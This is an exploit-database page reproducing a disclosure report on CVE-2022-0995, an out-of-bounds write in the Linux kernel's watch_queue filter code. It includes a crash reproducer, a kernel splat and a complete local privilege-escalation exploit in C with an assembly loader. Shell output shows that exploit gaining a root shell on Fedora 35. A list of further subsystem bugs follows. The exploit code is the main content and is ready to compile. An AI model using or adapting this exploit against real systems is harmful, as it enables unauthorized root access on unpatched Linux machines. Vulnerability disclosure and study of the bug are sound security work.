Exploitalert - Database of Exploits

Linux watch_queue Filter Out-Of-Bounds Write

CVE	Category	Price	Severity
CVE-2022-0995	CWE-787	Not Available	High

Author	Risk	Exploitation Type	Date
Mohamed Ghannam	High	Local	2022-04-19

CVSS	EPSS	EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N	0.02192	0.50148

CVSS vector description

Metric	Value	Metric Description	Value Description
Attack vector	Local	AV	The vulnerable system is not bound to the network stack and the attacker’s path is via read/write/execute capabilities. Either: the attacker exploits the vulnerability by accessing the target system locally (e.g., keyboard, console), or through terminal emulation (e.g., SSH); or the attacker relies on User Interaction by another person to perform actions required to exploit the vulnerability (e.g., using social engineering techniques to trick a legitimate user into opening a malicious document).
Attack Complexity	Low	AC	The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Attack Requirements	Present	AT	The successful attack depends on the presence of specific deployment and execution conditions of the vulnerable system that enable the attack. These include: A race condition must be won to successfully exploit the vulnerability. The successfulness of the attack is conditioned on execution conditions that are not under full control of the attacker. The attack may need to be launched multiple times against a single target before being successful. Network injection. The attacker must inject themselves into the logical network path between the target and the resource requested by the victim (e.g. vulnerabilities requiring an on-path attacker).
Privileges Required	Low	PR	The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
User Interaction	None	UI	The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Confidentiality Impact to the Vulnerable System	High	VC	There is a total loss of confidentiality, resulting in all information within the Vulnerable System being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server.
Availability Impact to the Vulnerable System	High	VI	There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the Vulnerable System. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the Vulnerable System.
Availability Impact to the Vulnerable System	High	VA	There is a total loss of availability, resulting in the attacker being able to fully deny access to resources in the Vulnerable System; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the Vulnerable System (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable).
Subsequent System Confidentiality Impact	Negligible	SC	There is no loss of confidentiality within the Subsequent System or all confidentiality impact is constrained to the Vulnerable System.
Integrity Impact to the Subsequent System	None	SI	There is no loss of integrity within the Subsequent System or all integrity impact is constrained to the Vulnerable System.
Availability Impact to the Subsequent System	None	SA	There is no loss of availibility within the Subsequent System or all availibility impact is constrained to the Vulnerable System.

https://cxsecurity.com/ascii/WLB-2022040080

Linux watch_queue Filter Out-Of-Bounds Write

Linux: watch_queue filter OOB write (and other bugs) This bug report is about things in the watch_queue subsystem, which is only enabled under CONFIG_WATCH_QUEUE. That seems to be disabled e.g. on Debian, but Ubuntu and Fedora enable it. The watch_queue subsystem has a bug that leads to out-of-bounds write in watch_queue_set_filter(): The first loop correctly checks for if (tf[i].type >= sizeof(wfilter->type_filter) * 8) but the second loop has the bound for .type wrong by a factor of 8 (on 64-bit systems): if (tf[i].type >= sizeof(wfilter->type_filter) * BITS_PER_LONG) This leads to two out-of-bounds writes: 1. out-of-bounds __set_bit() on wfilter->type_filter 2. out-of-bounds write of array elements behind wfilter->filters The following reproducer triggers an ASAN splat: ``` #define _GNU_SOURCE #include <unistd.h> #include <err.h> #include <stdio.h> #include <stdlib.h> #include <sys/ioctl.h> #include <sys/syscall.h> #include <linux/watch_queue.h> int main(void) { int pipefds[2]; if (pipe2(pipefds, O_NOTIFICATION_PIPE)) err(1, \"pipe2\"); int pfd = pipefds[0]; struct watch_notification_filter *filter = malloc(sizeof(struct watch_notification_filter) + sizeof(struct watch_notification_type_filter)); filter->nr_filters = 1; filter->__reserved = 0; filter->filters[0] = (struct watch_notification_type_filter){ .type = 1023 }; if (ioctl(pfd, IOC_WATCH_QUEUE_SET_FILTER, filter)) err(1, \"SET_FILTER\"); } ``` Here's the splat: ``` [ 83.180406][ T611] ================================================================== [ 83.181694][ T611] BUG: KASAN: slab-out-of-bounds in watch_queue_set_filter+0x659/0x740 [ 83.182928][ T611] Write of size 4 at addr ffff88800d2c66bc by task watch_queue_oob/611 [...] [ 83.187234][ T611] Call Trace: [ 83.187712][ T611] <TASK> [ 83.188133][ T611] dump_stack_lvl+0x45/0x59 [ 83.188796][ T611] print_address_description.constprop.0+0x1f/0x150 [...] [ 83.190539][ T611] kasan_report.cold+0x7f/0x11b [...] [ 83.192236][ T611] watch_queue_set_filter+0x659/0x740 [...] [ 83.194563][ T611] __x64_sys_ioctl+0x127/0x190 [ 83.195297][ T611] do_syscall_64+0x43/0x90 [ 83.195941][ T611] entry_SYSCALL_64_after_hwframe+0x44/0xae [...] [ 83.208194][ T611] Allocated by task 611: [ 83.208807][ T611] kasan_save_stack+0x1e/0x40 [ 83.209479][ T611] __kasan_kmalloc+0x81/0xa0 [ 83.210258][ T611] watch_queue_set_filter+0x23a/0x740 [ 83.211027][ T611] __x64_sys_ioctl+0x127/0x190 [ 83.211708][ T611] do_syscall_64+0x43/0x90 [ 83.212341][ T611] entry_SYSCALL_64_after_hwframe+0x44/0xae [ 83.213177][ T611] [ 83.213510][ T611] The buggy address belongs to the object at ffff88800d2c66a0 [ 83.213510][ T611] which belongs to the cache kmalloc-32 of size 32 [ 83.215452][ T611] The buggy address is located 28 bytes inside of [ 83.215452][ T611] 32-byte region [ffff88800d2c66a0, ffff88800d2c66c0) ``` In case you're wondering why syzkaller never managed to hit this: It actually has a definition file for watch queue stuff (https://github.com/google/syzkaller/blob/master/sys/linux/dev_watch_queue.txt), but that seems to be based on an older version of the series that introduced watch queues, so syzkaller doesn't know about O_NOTIFICATION_PIPE and instead tries to open /dev/watch_queue. Here's an extremely shoddy exploit that will sometimes give you a root shell on Fedora 35 and sometimes instead make the system hang/panic: ``` [user@fedora watch_queue]$ cat watch_queue_oob_elf_phdr.c #define _GNU_SOURCE #include <unistd.h> #include <err.h> #include <stdio.h> #include <stddef.h> #include <sched.h> //header conflict :/ //#include <fcntl.h> int open(const char *pathname, int flags, ...); #include <stdlib.h> #include <sys/ioctl.h> #include <sys/inotify.h> #include <sys/eventfd.h> #include <sys/resource.h> #include <sys/xattr.h> #include <sys/wait.h> #include <sys/mount.h> #include <sys/syscall.h> #include <linux/watch_queue.h> #include <linux/elf.h> #define SYSCHK(x) ({ \\ typeof(x) __res = (x); \\ if (__res == (typeof(x))-1) \\ err(1, \"SYSCHK(\" #x \")\"); \\ __res; \\ }) int main(void) { struct rlimit rlim_nofile; SYSCHK(getrlimit(RLIMIT_NOFILE, &rlim_nofile)); rlim_nofile.rlim_cur = rlim_nofile.rlim_max; SYSCHK(setrlimit(RLIMIT_NOFILE, &rlim_nofile)); // pin to one CPU core cpu_set_t cpu_set; CPU_ZERO(&cpu_set); CPU_SET(0, &cpu_set); SYSCHK(sched_setaffinity(0, sizeof(cpu_set_t), &cpu_set)); // create notification pipes, without filters yet int pfds[128]; for (int i=0; i<128; i++) { int pipefds[2]; SYSCHK(pipe2(pipefds, O_NOTIFICATION_PIPE)); pfds[i] = pipefds[0]; close(pipefds[1]); } // create a child with SCHED_IDLE policy that runs execve() when told to int continue_eventfd = SYSCHK(eventfd(0, 0)); pid_t child = SYSCHK(fork()); if (child == 0) { struct sched_param param = { .sched_priority = 0 }; SYSCHK(sched_setscheduler(0, SCHED_IDLE, &param)); eventfd_t evfd_value; SYSCHK(eventfd_read(continue_eventfd, &evfd_value)); SYSCHK(execl(\"/usr/bin/newgrp\", \"newgrp\", \"--bogus\", \"/bin/bash\", NULL)); } // set up an inotify watch to notify us every time the ELF parser reads from // the ELF binary (which involves preempting the ELF parser). int infd = SYSCHK(inotify_init()); SYSCHK(inotify_add_watch(infd, \"/usr/bin/newgrp\", IN_ACCESS)); // spam kmalloc-32 a bit. note that this might not be enough spam, depending // on how fragmented the slab is... // after spamming the slab, free all our allocations again, so that hopefully // we end up with a (more or less) empty CPU slab. #define NUM_SPAM 10000 /* 900 */ SYSCHK(unshare(CLONE_NEWUSER|CLONE_NEWNS)); SYSCHK(mount(\"none\", \"/dev/shm\", \"tmpfs\", MS_NOSUID|MS_NODEV, \"\")); int tmpfile = SYSCHK(open(\"/dev/shm/\", O_TMPFILE|O_RDWR, 0666)); for (int i=0; i<NUM_SPAM; i++) { char name[14] = \"security.XXXX\"; name[ 9] = 'A' + ((i >> 0) % 16); name[10] = 'A' + ((i >> 4) % 16); name[11] = 'A' + ((i >> 8) % 16); name[12] = 'A' + ((i >> 12) % 16); SYSCHK(fsetxattr(tmpfile, name, \"\", 0, XATTR_CREATE)); } close(tmpfile); // launch the ELF parser and preempt at every read. // note that PREEMPT_VOLUNTARY means we actually don't get rescheduled // directly at kernel_read(), instead it happens on the next kmalloc(): // __kmalloc() -> slab_alloc() -> slab_alloc_node() -> slab_pre_alloc_hook() // -> might_alloc() -> might_sleep_if() -> might_sleep() -> might_resched() // -> __cond_resched() // // First preemption is the allocation of memory for program headers, // second preemption is the allocation of memory for the interpreter name. // At the second preemption, the program headers have been loaded into // memory but the interpreter name's offset hasn't been read yet. // Third preemption is after the interpreter name has been stored in the // allocation but before it is passed to the VFS for opening. SYSCHK(eventfd_write(continue_eventfd, 1)); for (int i=0; i<3; i++) { struct inotify_event inev; if (SYSCHK(read(infd, &inev, sizeof(inev))) != sizeof(inev)) errx(1, \"bad inotify_event size\"); } struct watch_notification_filter *filter = malloc(sizeof(struct watch_notification_filter) + 2 * sizeof(struct watch_notification_type_filter)); filter->nr_filters = 1; filter->__reserved = 0; filter->filters[0] = (struct watch_notification_type_filter){ .type = 20 * 8, .info_mask = 0x80 }; for (int i=0; i<127; i++) { SYSCHK(ioctl(pfds[i], IOC_WATCH_QUEUE_SET_FILTER, filter)); } int status; int wait_res = wait(&status); printf(\"wait_res = %d\ \", wait_res); if (WIFEXITED(status)) { printf(\"exited with status %d\ \", WEXITSTATUS(status)); } else if (WIFSIGNALED(status)) { printf(\"signaled with signal %d\ \", WTERMSIG(status)); } else { printf(\"other?\ \"); } } [user@fedora watch_queue]$ gcc -o watch_queue_oob_elf_phdr watch_queue_oob_elf_phdr.c [user@fedora watch_queue]$ cat bogus-loader.S .global _start _start: /* setresuid(0, 0, 0) */ mov $117, %eax mov $0, %rdi mov $0, %rsi mov $0, %rdx syscall /* execve(argv[2], argv+2, envv) */ mov $59, %eax mov 24(%rsp), %rdi lea 24(%rsp), %rsi lea 40(%rsp), %rdx /* assume argc==3 */ syscall int $3 [user@fedora watch_queue]$ as -o bogus-loader.o bogus-loader.S [user@fedora watch_queue]$ ld -shared -o $'\\x80' bogus-loader.o [user@fedora watch_queue]$ ./watch_queue_oob_elf_phdr [root@fedora watch_queue]# id uid=0(root) gid=1000(user) groups=1000(user),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 ``` There are also some other bugs in the subsystem, but those are less easy to exploit or not security bugs at all: 1. free_pipe_info() first calls put_watch_queue(), which RCU-frees the struct watch_queue. Then afterwards it calls pipe_buf_release() on the pipe buffers, which calls watch_queue_pipe_buf_release(), which calls set_bit() on the already RCU-freed watch_queue. This is at least theoretically a UAF, in particular under CONFIG_PREEPMT. 2. watch_queue_pipe_buf_ops has a .get handler that calls try_get_page() and a .release handler that doesn't touch the page count. This would be a bug, except that this is dead code because none of the splice stuff works on notification pipes. 3. From what I can tell, watch_queue_set_size() permits setting a non-power-of-two number of buffers, which will break the code that assumes that you can use bitmasks instead of modulo for indexing into the pipe buffers array. 4. watch_queue_set_size() sets wqueue->nr_notes to nr_notes rounded up to a multiple of WATCH_QUEUE_NOTES_PER_PAGE while allocating the ->notes_bitmap with size nr_notes bits rounded up to a multiple of BITS_PER_LONG. On architectures with big PAGE_SIZE, this could lead to wqueue->nr_notes being bigger than the bitmap. 5. wqueue->notes_bitmap is never freed. 6. There is no synchronization between post_one_notification() and pipe_read(), neither locking nor smp_store_release(). 7. watch_queue_clear() has a comment claiming that ->defunct prevents new additions and notifications, but actually it only prevents notifications, not additions. This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2022-06-08. Related CVE Numbers: CVE-2022-0995. Found by: [email protected]

Impressum